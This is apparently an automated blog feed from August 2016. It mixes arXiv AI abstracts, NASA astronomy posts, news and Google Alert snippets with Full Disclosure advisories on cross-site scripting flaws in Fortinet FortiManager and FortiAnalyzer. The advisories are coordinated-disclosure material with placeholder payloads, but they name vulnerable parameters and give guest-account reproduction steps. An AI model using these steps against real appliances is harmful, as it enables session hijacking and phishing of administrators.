Online solutions for businesses of all sizes. #Induction #Training #CPD #Certification #PerformanceManagement #RiskManagement #HRTech #LMS
Gold Coast, Australia
https://t.co/pyVRW2wfXX
Following: 1533 - Followers: 1524

August 05, 2016 at 03:05AM via Twitter http://twitter.com/mediasphere_au

M63: Sunflower Galaxy Wide Field


The Sunflower Galaxy blooms near the center of this wide field telescopic view. The scene spans about 2 degrees or 4 full moons on the sky toward the loyal constellation Canes Venatici. More formally known as Messier 63, the majestic island universe is nearly 100,000 light-years across, about the size of our own Milky Way Galaxy. Surrounding its bright yellowish core, sweeping spiral arms are streaked with cosmic dust lanes and dotted with star forming regions. A dominant member of a known galaxy group, M63 has faint, extended features that could be the the remains of dwarf satellite galaxies, evidence that large galaxies grow by accreting small ones. M63 shines across the electromagnetic spectrum and is thought to have undergone bursts of intense star formation. via NASA http://ift.tt/2akDW0Y

Thursday, August 4, 2016

Anonymous

Anonymous. Aug 04, 2016. World Bank. Racial discrimination in the World Bank is a far more systemic and serious issue than any official is willing to ...

from Google Alert - anonymous http://ift.tt/2aMGymJ
via IFTTT

Anonymous

Anonymous. Anonymous. Quantcast. Copyright 1998-2016 by WE ACT Terms Of Use Privacy Statement. Sign in with Facebook, Twitter or email.

from Google Alert - anonymous http://ift.tt/2aBTZGz
via IFTTT

Paraconsistency and Word Puzzles. (arXiv:1608.01338v1 [cs.AI])

Word puzzles and the problem of their representations in logic languages have received considerable attention in the last decade (Ponnuru et al. 2004; Shapiro 2011; Baral and Dzifcak 2012; Schwitter 2013). Of special interest is the problem of generating such representations directly from natural language (NL) or controlled natural language (CNL). An interesting variation of this problem, and to the best of our knowledge, scarcely explored variation in this context, is when the input information is inconsistent. In such situations, the existing encodings of word puzzles produce inconsistent representations and break down. In this paper, we bring the well-known type of paraconsistent logics, called Annotated Predicate Calculus (APC) (Kifer and Lozinskii 1992), to bear on the problem. We introduce a new kind of non-monotonic semantics for APC, called consistency preferred stable models and argue that it makes APC into a suitable platform for dealing with inconsistency in word puzzles and, more generally, in NL sentences. We also devise a number of general principles to help the user choose among the different representations of NL sentences, which might seem equivalent but, in fact, behave differently when inconsistent information is taken into account. These principles can be incorporated into existing CNL translators, such as Attempto Controlled English (ACE) (Fuchs et al. 2008) and PENG Light (White and Schwitter 2009). Finally, we show that APC with the consistency preferred stable model semantics can be equivalently embedded in ASP with preferences over stable models, and we use this embedding to implement this version of APC in Clingo (Gebser et al. 2011) and its Asprin add-on (Brewka et al. 2015).



from cs.AI updates on arXiv.org http://ift.tt/2axGpm3
via IFTTT

Interacting Conceptual Spaces. (arXiv:1608.01402v1 [cs.AI])

We propose applying the categorical compositional scheme of [6] to conceptual space models of cognition. In order to do this we introduce the category of convex relations as a new setting for categorical compositional semantics, emphasizing the convex structure important to conceptual space applications. We show how conceptual spaces for composite types such as adjectives and verbs can be constructed. We illustrate this new model on detailed examples.



from cs.AI updates on arXiv.org http://ift.tt/2axGO8c
via IFTTT

Quantifier Scope in Categorical Compositional Distributional Semantics. (arXiv:1608.01404v1 [cs.CL])

In previous work with J. Hedges, we formalised a generalised quantifiers theory of natural language in categorical compositional distributional semantics with the help of bialgebras. In this paper, we show how quantifier scope ambiguity can be represented in that setting and how this representation can be generalised to branching quantifiers.



from cs.AI updates on arXiv.org http://ift.tt/2axGOVz
via IFTTT

Stable Models for Infinitary Formulas with Extensional Atoms. (arXiv:1608.01603v1 [cs.LO])

The definition of stable models for propositional formulas with infinite conjunctions and disjunctions can be used to describe the semantics of answer set programming languages. In this note, we enhance that definition by introducing a distinction between intensional and extensional atoms. The symmetric splitting theorem for first-order formulas is then extended to infinitary formulas and used to reason about infinitary definitions. This note is under consideration for publication in Theory and Practice of Logic Programming.



from cs.AI updates on arXiv.org http://ift.tt/2axGrdQ
via IFTTT

Query Answering in Resource-Based Answer Set Semantics. (arXiv:1608.01604v1 [cs.AI])

In recent work we defined resource-based answer set semantics, which is an extension to answer set semantics stemming from the study of its relationship with linear logic. In fact, the name of the new semantics comes from the fact that in the linear-logic formulation every literal (including negative ones) were considered as a resource. In this paper, we propose a query-answering procedure reminiscent of Prolog for answer set programs under this extended semantics as an extension of XSB-resolution for logic programs with negation. We prove formal properties of the proposed procedure.

Under consideration for acceptance in TPLP.



from cs.AI updates on arXiv.org http://ift.tt/2aUPEAr
via IFTTT

Deploying learning materials to game content for serious education game development: A case study. (arXiv:1608.01611v1 [cs.AI])

The ultimate goals of serious education games (SEG) are to facilitate learning and maximizing enjoyment during playing SEGs. In SEG development, there are normally two spaces to be taken into account: knowledge space regarding learning materials and content space regarding games to be used to convey learning materials. How to deploy the learning materials seamlessly and effectively into game content becomes one of the most challenging problems in SEG development. Unlike previous work where experts in education have to be used heavily, we proposed a novel approach that works toward minimizing the efforts of education experts in mapping learning materials to content space. For a proof-of-concept, we apply the proposed approach in developing an SEG game, named \emph{Chem Dungeon}, as a case study in order to demonstrate the effectiveness of our proposed approach. This SEG game has been tested with a number of users, and the user survey suggests our method works reasonably well.



from cs.AI updates on arXiv.org http://ift.tt/2axHn1H
via IFTTT

Black-Box Policy Search with Probabilistic Programs. (arXiv:1507.04635v4 [stat.ML] UPDATED)

In this work, we explore how probabilistic programs can be used to represent policies in sequential decision problems. In this formulation, a probabilistic program is a black-box stochastic simulator for both the problem domain and the agent. We relate classic policy gradient techniques to recently introduced black-box variational methods which generalize to probabilistic program inference. We present case studies in the Canadian traveler problem, Rock Sample, and a benchmark for optimal diagnosis inspired by Guess Who. Each study illustrates how programs can efficiently represent policies using moderate numbers of parameters.



from cs.AI updates on arXiv.org http://ift.tt/1gErlEI
via IFTTT

"Why Should I Trust You?": Explaining the Predictions of Any Classifier. (arXiv:1602.04938v2 [cs.LG] UPDATED)

Despite widespread adoption, machine learning models remain mostly black boxes. Understanding the reasons behind predictions is, however, quite important in assessing trust, which is fundamental if one plans to take action based on a prediction, or when choosing whether to deploy a new model. Such understanding also provides insights into the model, which can be used to transform an untrustworthy model or prediction into a trustworthy one. In this work, we propose LIME, a novel explanation technique that explains the predictions of any classifier in an interpretable and faithful manner, by learning an interpretable model locally around the prediction. We also propose a method to explain models by presenting representative individual predictions and their explanations in a non-redundant way, framing the task as a submodular optimization problem. We demonstrate the flexibility of these methods by explaining different models for text (e.g. random forests) and image classification (e.g. neural networks). We show the utility of explanations via novel experiments, both simulated and with human subjects, on various scenarios that require trust: deciding if one should trust a prediction, choosing between models, improving an untrustworthy classifier, and identifying why a classifier should not be trusted.



from cs.AI updates on arXiv.org http://ift.tt/1VlBpRg
via IFTTT

Coordination in Categorical Compositional Distributional Semantics. (arXiv:1606.01515v2 [cs.CL] UPDATED)

An open problem with categorical compositional distributional semantics is the representation of words that are considered semantically vacuous from a distributional perspective, such as determiners, prepositions, relative pronouns or coordinators. This paper deals with the topic of coordination between identical syntactic types, which accounts for the majority of coordination cases in language. By exploiting the compact closed structure of the underlying category and Frobenius operators canonically induced over the fixed basis of finite-dimensional vector spaces, we provide a morphism as representation of a coordinator tensor, and we show how it lifts from atomic types to compound types. Linguistic intuitions are provided, and the importance of the Frobenius operators as an addition to the compact closed setting with regard to language is discussed.



from cs.AI updates on arXiv.org http://ift.tt/214gZil
via IFTTT

Ravens: Justin Tucker thinks he can make field goal from 84.5 yards "if the situation is prime"; NFL record is 64 yards (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Bekanntmachung

Artist: Anonymous. Date: ca. 1914. Medium: Commercial lithograph. Dimensions: Sheet: 19 5/8 × 15 11/16 in. (49.8 × 39.8 cm). Classifications: Prints ...

from Google Alert - anonymous http://ift.tt/2ayJZh6
via IFTTT

[FD] Stored Cross-Site Scripting vulnerability in Count per Day WordPress Plugin

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Cross-Site Scripting in Count per Day WordPress Plugin

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Cross-Site Scripting in FormBuilder WordPress Plugin

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Cross-Site Scripting vulnerability in Events Made Easy WordPress plugin

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

Ravens: DE Bronson Kaufusi, a 2016 3rd-round pick, will miss season after breaking his ankle in Thursday's practice (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

I have a new follower on Twitter


Gagliano Alexandre
innovateur-entrepreneur-marketeur- digitalizer@CX@Oracle
France&Spain
https://t.co/bxTvEtGnVk
Following: 4255 - Followers: 2973

August 04, 2016 at 11:20AM via Twitter http://twitter.com/alex_gagliano

Anonymous

Anonymous. Activity. Anonymous published Crossed Out Email Addresses in FAQs. posted 1 day ago. Quantcast. Sign in to NationBuilder.com.

from Google Alert - anonymous http://ift.tt/2aAaCTh
via IFTTT

ISS Daily Summary Report – 08/03/2016

Fluid Shifts Operations In the Service Module: With ground team assistance, crewmembers configured the Optical Coherence Tomography (OCT) hardware, the Cerebral and Cochlear Fluid Pressure (CCFP) analyzer, and the Distortion Product Otoacoustic Emission (DPOAE) hardware before conducting a DPOAE test, OCT exam, and the Tonometry exam. The scheduled CCFP test was not completed due to software issues that could not be resolved during the Chibis session. However ground teams confirmed that the OCT, Tonometry and DPOAE exams were successfully completed. The purpose of this investigation is to characterize the space flight-induced fluid shift, including intra- and extravascular shifts, intra- and extracellular shifts, changes in total body water and lower vs. upper body shifts. Noninvasive techniques are used to assess arterial and venous dimensions and flow parameters, ocular pressure and structure, and changes in intracranial pressure. Lower body negative pressure is being investigated for its ability to mitigate some of the effects of the space flight-induced fluid shift. Results from this investigation are expected to help define the causes of the ocular structure and vision changes associated with long duration space flight and assist in the development of countermeasures.  Heart Cells Microscope Operations: The crew set up the Heart Cells microscope, removed the BioCell Habitat from the Space Automated Bioproduct Lab (SABL) and the Multiwell BioCell from the BioCell Habitat and inserted into the microscope before completing Heart Cells operations. The Heart Cells investigation studies the human heart, specifically how heart muscle tissue, contracts, grows and changes (gene expression) in microgravity and how those changes vary between subjects. Understanding how heart muscle cells, or cardiomyocytes, change in space improves efforts for studying disease, screening drugs and conducting cell replacement therapy for future space missions.  Mouse Epigenetics Cage Unit Maintenance: The crew completed standard maintenance activities for the Mouse Epigenetics experiment by exchanging the food cartridge of the Mouse Habitat Cage Unit which is located in the Cell Biology Experiment Facility (CBEF). The Mouse Epigenetics investigation studies altered gene expression patterns in the organs of male mice that spend one month in space, and also examines changes in the deoxyribonucleic acid (DNA) of their offspring. Results from the investigation identify genetic alterations that happen after exposure to the microgravity environment of space. Dose Tracker: The crew completed entries for medication tracking today. This investigation documents the medication usage of crewmembers before and during their missions by capturing data regarding medication use during spaceflight, including side effect qualities, frequencies and severities. The data is expected to either support or counter anecdotal evidence of medication ineffectiveness during flight and unusual side effects experienced during flight. It is also expected that specific, near-real-time questioning about symptom relief and side effects will provide the data required to establish whether spaceflight-associated alterations in pharmacokinetics (PK) or pharmacodynamics (PD) is occurring during missions. NanoRacks External Platform (NREP) Preparation: In preparation for tomorrow’s NREP installation operations on the Japanese Experiment Module (JEM) Airlock (JEMAL) Slide Table, the crew reviewed operation information and gathered hardware to support NREP assembly activities. Extravehicular Activity Mobility Unit (EMU) checkout: The crew retrieved Extravehicular Activity Mobility Unit (EMU) 3006 which was delivered on SpX-9 and installed it on the Forward EMU Don/Doff Assembly (EDDA). The crew then performed an initial checkout of EMU systems to confirm suit 3006 as a viable spare prior to returning the previous spare (EMU 3005) on SpaceX-9.  Patch Uplink for ETCS Loop Startup Freeze Protection:  Ground teams uplinked a patch to the EXT and S0 MDMs.  This patch provides a Fault Detection, Isolation, & Recovery (FDIR) to limit the amount of time that cold ammonia can flow through the External Thermal Control System (ETCS) during startup, to prevent the Interface Heat Exchanger (IFHX) from freezing if there is cold ammonia flowing through the ETCS with stagnant water present in the IFHX. The new FDIR will cut power to the pumps when this timer expires and stop the flow of ammonia. The new FDIR has been enabled.  Wastewater Storage Tank Assembly (WSTA) Drain and Multifiltration (MF) Bed #2 Effluent Sample The Urine Processor Assembly (UPA) WSTA was drained into an EDV and subsequently refilled. A sample will be taken from this EDV later this week to address high conductivity seen in the UPA. The Water Processor Assembly (WPA) MF bed was also drained so that a sample could be taken to address high conductivity in the WPA. After the sample was collected, WPA was put back in standby. Both samples will be returned to ground on SpaceX-9. On Board Training (OBT) Medical Emergency: The 47S crew participated in this training which provides the opportunity to review procedures, hardware and communication methods necessary to manage a medical emergency. Specific topics covered included: Emergency medical hardware configuration and desired deployment locations. Individual preference for performing chest compressions in microgravity. Crew communication and coordination of care during an emergency medical event. Today’s Planned Activities All activities were completed unless otherwise noted. FLUID SHIFTS. OCT Setup in SM FLUID SHIFTS. Comm configuration for the experiment / r/g 9995 FLUID SHIFTS. Gathering and Connecting Equipment for TV coverage FLUID SHIFTS. Connecting OCT Laptop to RS BRI and HRF PC to ППС-26 (Instead of RSE-Med) r/g 2978 CASKAD. Manual Mixing in Bioreactor / r/g 2888 Acoustic Dosimeter Setup Day 2 FLUID SHIFTS. OCT Power up in SM Soyuz 731 Samsung Tablet Recharge, Initiate MOUSE Gather Hardware for the Experiment LDST. Drawer Installation FLUID SHIFTS. TONO Hardware setup in SM Dust Filter Replacement and MRM1 Gas-Liquid Heat Exchanger (ГЖТ) Cleaning On-orbit Hearing Assessment using EARQ FLUID SHIFTS. CCFP Activation and Settings Adjustments in RS [Aborted] Multi Omics. Item gathering MCRSCPE Hardware Setup FLUID SHIFTS. DPOAE Setup in SM DOSETRK iPad data entry FLUID SHIFTS. Chibis Setup / r/g 2979 FLUID SHIFTS. Operator Assistance with Chibis and Gamma-1 r/g 2979 XF305 Camcorder Settings Adjustment FLUID SHIFTS. Gathering Data in SM, Subject  [CCFP activity aborted] FLUID SHIFTS. Gathering Data in SM, Operator  [CCFP activity aborted] Mouse Habitat Cage Unit Maintenance, Refilling water and exchanging Food Cartridge   [Water refill […]

from ISS On-Orbit Status Report http://ift.tt/2akAhAf
via IFTTT

Lambda (anonymous/first class procedures) and custom reporters

Lambda (anonymous/first class procedures) and custom reporters. birdoftheday wrote: Jonathan50 wrote: So the report block is a reporter…? It reports ...

from Google Alert - anonymous http://ift.tt/2aRlH34
via IFTTT

[FD] FortiManager (Series) - (Bookmark) Persistent Vulnerability

Document Title: =============== FortiManager (Series) - (Bookmark) Persistent Vulnerability References (Source): ==================== http://ift.tt/2aUdRqX Fortinet PSIRT ID: 1624461 Release Notes 1: http://ift.tt/1rpfA9Y Release Notes 2: http://ift.tt/25X4c8e Release Notes 3: http://ift.tt/2ak3USy Release Date: ============= 2016-08-04 Vulnerability Laboratory ID (VL-ID): ==================================== 1685 Common Vulnerability Scoring System: ==================================== 3.8 Product & Service Introduction: =============================== FortiManager appliances allow you to centrally manage any number of Fortinet devices, from several to thousands, including FortiGate®, FortiWiFi™, FortiCarrier™, FortiMail™ and FortiAnalyzer™ appliances and virtual appliances, as well as FortiClient™ endpoint security agents. You can further simplify control and management of large deployments by grouping devices and agents into administrative domains (ADOMs). The FortiManager family of management appliances provides centralized policy-based provisioning, device configuration, and update management for FortiGate, FortiWiFi, and FortiMail appliances, and FortiClient end-point security agents, plus end-to-end network monitoring and device control. FortiManager delivers a lower TCO for Fortinet implementations by minimizing both initial deployment costs and ongoing operating expenses. Control administrative access and simplify policy deployment using role-based administration to define user privileges for specific management domains and functions, and aggregating collections of Fortinet appliances and agents into independent management domains. In addition, by locally hosting security content updates for managed devices and agents, FortiManager appliances minimize Web filtering rating request response time and maximize network protection. (Copy of the Vendor Homepage: http://ift.tt/225kwMQ ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Core Research Team discovered a persistent web validation vulnerability in the official Fotinet FortiManager appliance product series. The issue affects the web-application of the appliance series and is present in the following fortimanager models - 200D, 300D, 1000D, 3900E, 4000E, Virtual Appliances Version and FortiMoM-VM. The Fortimanager legacy models 100, 100C, 400A, 400B, 400C, 1000C, 3000C and 4000D are affected as well by the vulnerability. Persistent Web Vulnerability Disclosure Timeline: ================================== 2016-01-25: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH) 2016-01-26: Vendor Notification (FortiGuard Security Team) 2016-02-15: Vendor Response/Feedback (FortiGuard Security Team) 2016-04-08: Vendor Fix/Patch (Fortinet Developer Team) 2016-05-22: Vendor Fix/Patch (Fortinet Developer Team) 2016-07-13: Security Bulletin (FortiGuard Security Team) [Acknowledgements] 2016-08-04: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Fortinet Product: FortiManager - Appliance (Web-Application) 200D, 300D, 1000D, 3900E, 4000E, Virtual Appliances Versio Fortinet Product: FortiManager - Appliance (Web-Application) Legacy - 100, 100C, 400A, 400B, 400C, 1000C, 3000C & 4000 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A persistent and non-persistent input validation web vulnerability has been discovered in the official Fotinet FortiManager appliance product series. The vulnerability allows privileged guest user accounts and restricted user accounts to inject own malicious script codes on the application-side or client-side of the fortimanager appliance web-application series. The vulnerability is located in the `name and description` input fields of the vulnerable `Policy & Objects - Security Profiles - SSL VPN Portal` module. The request method to inject is POST to GET and the attack vector is located on the application-side of the appliance web-application. Remote attackers are able to inject own malicious script codes to the name and description input fields. After processing to add, the code bypasses the regular web filter of the appliance web-application and executes finally in the pre-defined bookmarks listing module above with the basic input. The vulnerability can be exploited by guest appliance user accounts with restricted access. The vulnerability first executes with client-side attack vector and becomes persistent with the save procedure by return. The security risk of the application-side and client-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.8. Exploitation of the application-side web vulnerability requires a low privileged guest web-application user account and low user interaction. Successful exploitation of the vulnerability results in persistent phishing, session hijacking, persistent external redirect to malicious sources and application-side manipulation of affected or connected web module context. Request Method(s): [+] POST Vulnerable Module(s): [+] Policy & Objects - Security Profiles - SSL VPN Portal Vulnerable Parameter(s): [+] name [+] description Affected Module(s): [+] Predefined Bookmarks - [Create] Listing Affected Serie(s): FortiManager [+] FortiManager 200D [+] FortiManager 300D [+] FortiManager 1000D [+] FortiManager 3900E [+] FortiManager-4000E [+] FortiManager Virtual Appliances [+] FortiMoM-VM FortiManager Legacy Models [+] FortiManager 100 [+] FortiManager 100C [+] FortiManager 400A [+] FortiManager 400B [+] FortiManager 400C [+] FortiManager 1000C [+] FortiManager 3000C [+] FortiManager 4000D Proof of Concept (PoC): ======================= The persistent input validation web vulnerability can be exploited by low privileged guest web-application user accounts with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability as guest user with restricted access privileges ... 1. Login to the fortimanager appliance web-application as guest user 2. Open the following section that is not restricted to guests mainly (http://ift.tt/2ak56VG) 3. Click Security Profiles > SSL VPN Portal 4. Now click the pre-defined Bookmarks button ahead to the listing 5. Add your test payload to verify the issue in the Name and Description input field 6. Save the entry 7. The code executes in the Pre-Defined Bookmarks listing context in two locations 8. Save the entry by return again 9. Now you reopen the post to edit the pre-defined bookmarks 10. A second execution of the payload occurs in the edit form next to the category entry 11. Successful reproduce of the persistent vulnerability! PoC: Source #1 - Policy & Objects > Security Profiles > SSL VPN Portal > Predefined Bookmarks > [Create] Listing <"[PERSISTENT SCRIPT CODE EXECUTION!]"> PoC: Source #2 - Edit Form (Category)
<"<[PERSISTENT SCRIPT CODE EXECUTION!] sr"="" maxlength="35" style="position:static;background: url(/resource/images/tabOption.gif) center right no-repeat #FFF;">
Name Type Location Description
Bookmarks
"> <"<[PERSISTENT SCRIPT CODE EXECUTION!]"
"><"<[PERSISTENT SCRIPT CODE EXECUTION!]>" SSH benjamin-km [PERSISTENT SCRIPT CODE EXECUTION!]
Name <"<[PERSISTENT SCRIPT CODE EXECUTION!]" maxlength=35 >
Type
Location
Remote Port
Listening Port
Screen Width
Screen Height
Logon User
Password
Keyboard Layout
Description <"<[PERSISTENT SCRIPT CODE EXECUTION!]>" maxlength=128>
Full Screen Mode
Display Status
SSO
Field Name Value


Source: Gmail -> IFTTT-> Blogger

[FD] FortiAnalyzer & FortiManager - Client Side Cross Site Scripting Web Vulnerability

Document Title: =============== FortiAnalyzer & FortiManager - Client Side Cross Site Scripting Web Vulnerability References (Source): ==================== http://ift.tt/1txJKtF Fortinet PSIRT ID: 1624489 Release Notes 1: http://ift.tt/25X4c8e Release Notes 2: http://ift.tt/2ak3USy Release Notes 3: http://ift.tt/2b4F1Hp Release Notes 4: http://ift.tt/1rpfA9Y Release Date: ============= 2016-08-03 Vulnerability Laboratory ID (VL-ID): ==================================== 1686 Common Vulnerability Scoring System: ==================================== 3 Product & Service Introduction: =============================== FortiManager appliances allow you to centrally manage any number of Fortinet devices, from several to thousands, including FortiGate®, FortiWiFi™, FortiCarrier™, FortiMail™ and FortiAnalyzer™ appliances and virtual appliances, as well as FortiClient™ endpoint security agents. You can further simplify control and management of large deployments by grouping devices and agents into administrative domains (ADOMs). The FortiManager family of management appliances provides centralized policy-based provisioning, device configuration, and update management for FortiGate, FortiWiFi, and FortiMail appliances, and FortiClient end-point security agents, plus end-to-end network monitoring and device control. FortiManager delivers a lower TCO for Fortinet implementations by minimizing both initial deployment costs and ongoing operating expenses. Control administrative access and simplify policy deployment using role-based administration to define user privileges for specific management domains and functions, and aggregating collections of Fortinet appliances and agents into independent management domains. In addition, by locally hosting security content updates for managed devices and agents, FortiManager appliances minimize Web filtering rating request response time and maximize network protection. (Copy of the Vendor Homepage: http://ift.tt/225kwMQ ) FortiAnalyzer Network Security Logging, Analysis, and Reporting Appliances securely aggregate log data from Fortinet Security Appliances. A comprehensive suite of easily customable reports allows you to quickly analyze and visualize network threats, inefficiencies and usage. FortiAnalyzer is one of several versatile Fortinet Management Products that provide a diversity of deployment types, growth flexibility, advanced customization through APIs and simple licensing. (Copy of the Vendor Homepage: http://ift.tt/2ak3knR ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Core Research Team discovered a non-persistent web validation vulnerability in the official Fotinet FortiManager & Fortianalyzer appliance product series. Vulnerability Disclosure Timeline: ================================== 2016-01-25: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH) 2016-01-26: Vendor Notification (FortiGuard Security Team) 2016-03-12: Vendor Response/Feedback (FortiGuard Security Team) 2016-03-17: Vendor Fix/Patch #1 (Fortinet Service Developer Team) 2016-07-28: Vendor Fix/Patch #2 (Fortinet Service Developer Team) 2016-08-03: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Fortinet Product: FortiManager - Appliance (Web-Application) 200D, 300D, 1000D, 3900E, 4000E, Virtual Appliances Versio Fortinet Product: FortiManager - Appliance (Web-Application) Legacy - 100, 100C, 400A, 400B, 400C, 1000C, 3000C & 4000 Fortinet Product: FortiAnalyzer - Appliance (Web-Application) 200D, 300D, 1000D, 2000D, 3000E, 3500E, 3900E, VM Base & VM Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A client-side cross site scripting web vulnerability has been discovered in the official Fortinet FortiManager and FortiAnalyzer appliance web-application. The vulnerability allows remote attackers to inject own script codes to client-side browser requests of the affected vulnerable web-application context module. The vulnerability is located in the `tabs` and `&url` values of the `tabs.htm` file. Remote attackers are able to inject malicious script codes to the client-side of the vulnerable docroot module. The request method to inject is GET and the attack vector is located on the client-side of the appliance web-application. the issue affects the fortimanagaer and the fortianalyzer appliance web-application model series. The security risk of the client-side cross site scripting web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.0. Exploitation of the application-side web vulnerability requires no privileged web-application user account and low or medium user interaction. Successful exploitation of the vulnerability results in non-persistent phishing, session hijacking, non-persistent external redirect to malicious sources and client-side manipulation of affected or connected web module context. Request Method(s): [+] GET Vulnerable Module(s): [+] ./cgi-bin/module/docroot/ Vulnerable File(s): [+] tabview.htm Vulnerable Parameter(s): [+] tabs + &urls Affected Serie(s): FortiManager [+] FortiManager 200D [+] FortiManager 300D [+] FortiManager 1000D [+] FortiManager 3900E [+] FortiManager 4000E [+] FortiManager Virtual Appliances [+] FortiMoM-VM FortiManager Legacy Models [+] FortiManager 100 [+] FortiManager 100C [+] FortiManager 400A [+] FortiManager 400B [+] FortiManager 400C [+] FortiManager 1000C [+] FortiManager 3000C [+] FortiManager 4000D Affected Serie(s): FortiAnalyzer [+] FortiAnalyzer 200D [+] FortiAnalyzer 300D [+] FortiAnalyzer 1000D [+] FortiAnalyzer 2000B [+] FortiAnalyzer 3000E [+] FortiAnalyzer 3500E [+] FortiAnalyzer 3900E [+] FortiAnalyzer VM Base [+] FortiAnalyzer VM GB1 [+] FortiAnalyzer VM GB5 [+] FortiAnalyzer VM GB25 [+] FortiAnalyzer VM GB100 [+] FortiAnalyzer VM GB500 [+] FortiAnalyzer VM GB2000 Proof of Concept (PoC): ======================= The client-side cross site scripting web vulnerability can be exploited by remote attackers without privileged web-application user account and with low or medium user interaction. For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue. PoC: Example(s) http://ift.tt/2b4ERQm SIDE CROSS SITE SCRIPTING VULNERABILITY!]&tabviewid=dvmtabview&ids=fromdvm=1&i=aa http://ift.tt/2ak3P1b SIDE CROSS SITE SCRIPTING VULNERABILITY!]&tabviewid=dvmtabview&ids=fromdvm=1&i=aa PoC: #1 - Fortimanager http://ift.tt/2b4F1r8 http://ift.tt/2ak3onf PoC: #2 - Fortianalyzer http://ift.tt/2b4EghC http://ift.tt/2ak3Vph

Source: Gmail -> IFTTT-> Blogger

Prev - Next doesn't work for Anonymous user

But as an anonymous user it is not present, also when we "Inspect Element" we receive errors in console. For errors, please see attached screenshot.

from Google Alert - anonymous http://ift.tt/2ajTwtZ
via IFTTT

I have a new follower on Twitter


Sachin Ghai
technology creator, adopter... current interests BigData and hadoop sphere...

https://t.co/OgktS2H9bL
Following: 844 - Followers: 675

August 04, 2016 at 01:38AM via Twitter http://twitter.com/sachinghai

Behold the Universe


What if you climbed up on a rock and discovered the Universe? You can. Although others have noted much of it before, you can locate for yourself stars, planets, and even the plane of our Milky Way Galaxy. All you need is a dark clear sky -- the rock is optional. If you have a camera, you can further image faint nebulas, galaxies, and long filaments of interstellar dust. If you can process digital images, you can bring out faint features, highlight specific colors, and merge foreground and background images. In fact, an industrious astrophotographer has done all of these to create the presented picture. All of the component images were taken early last month on the same night within a few meters of each other. The picturesque setting was Sand Beach in Stonington, Maine, USA with the camera pointed south over Penobscot Bay. via NASA http://ift.tt/2aPLnOx

anonymous-sums

anonymous-sums. Anonymous sum types http://www.github.com/massysett/anonymous-sums. Version on this page: 0.4.0.0. LTS Haskell 6.10: 0.4.0.0.

from Google Alert - anonymous https://www.google.com/url?rct=j&sa=t&url=https://www.stackage.org/nightly-2016-08-02/package/anonymous-sums-0.4.0.0&ct=ga&cd=CAIyGjgxMzAxNTQ0ZWE3M2NhMmQ6Y29tOmVuOlVT&usg=AFQjCNEFvaV5V0Nz2HT8Ia-gGbbK65amcQ
via IFTTT

Wednesday, August 3, 2016

Crime Stoppers Gets $2000 to Support Anonymous Tip-Line

NewsChannel 20 and Green Family stores is donating $2000 to Crime Stoppers of Sangamon and Menard Counties.Crime Stoppers will be using the ...

from Google Alert - anonymous http://ift.tt/2b45SmW
via IFTTT

Proceedings of the 2016 Workshop on Semantic Spaces at the Intersection of NLP, Physics and Cognitive Science. (arXiv:1608.01018v1 [cs.CL])

This volume contains the Proceedings of the 2016 Workshop on Semantic Spaces at the Intersection of NLP, Physics and Cognitive Science (SLPCS 2016), which was held on the 11th of June at the University of Strathclyde, Glasgow, and was co-located with Quantum Physics and Logic (QPL 2016). Exploiting the common ground provided by the concept of a vector space, the workshop brought together researchers working at the intersection of Natural Language Processing (NLP), cognitive science, and physics, offering them an appropriate forum for presenting their uniquely motivated work and ideas. The interplay between these three disciplines inspired theoretically motivated approaches to the understanding of how word meanings interact with each other in sentences and discourse, how diagrammatic reasoning depicts and simplifies this interaction, how language models are determined by input from the world, and how word and sentence meanings interact logically. This first edition of the workshop consisted of three invited talks from distinguished speakers (Hans Briegel, Peter G\"ardenfors, Dominic Widdows) and eight presentations of selected contributed papers. Each submission was refereed by at least three members of the Programme Committee, who delivered detailed and insightful comments and suggestions.



from cs.AI updates on arXiv.org http://ift.tt/2ausOvJ
via IFTTT

Empirical Evaluation of Real World Tournaments. (arXiv:1608.01039v1 [cs.GT])

Computational Social Choice (ComSoc) is a rapidly developing field at the intersection of computer science, economics, social choice, and political science. The study of tournaments is fundamental to ComSoc and many results have been published about tournament solution sets and reasoning in tournaments. Theoretical results in ComSoc tend to be worst case and tell us little about performance in practice. To this end we detail some experiments on tournaments using real wold data from soccer and tennis. We make three main contributions to the understanding of tournaments using real world data from English Premier League, the German Bundesliga, and the ATP World Tour: (1) we find that the NP-hard question of finding a seeding for which a given team can win a tournament is easily solvable in real world instances, (2) using detailed and principled methodology from statistical physics we show that our real world data obeys a log-normal distribution; and (3) leveraging our log-normal distribution result and using robust statistical methods, we show that the popular Condorcet Random (CR) tournament model does not generate realistic tournament data.



from cs.AI updates on arXiv.org http://ift.tt/2autAZO
via IFTTT

Generation of Near-Optimal Solutions Using ILP-Guided Sampling. (arXiv:1608.01093v1 [cs.AI])

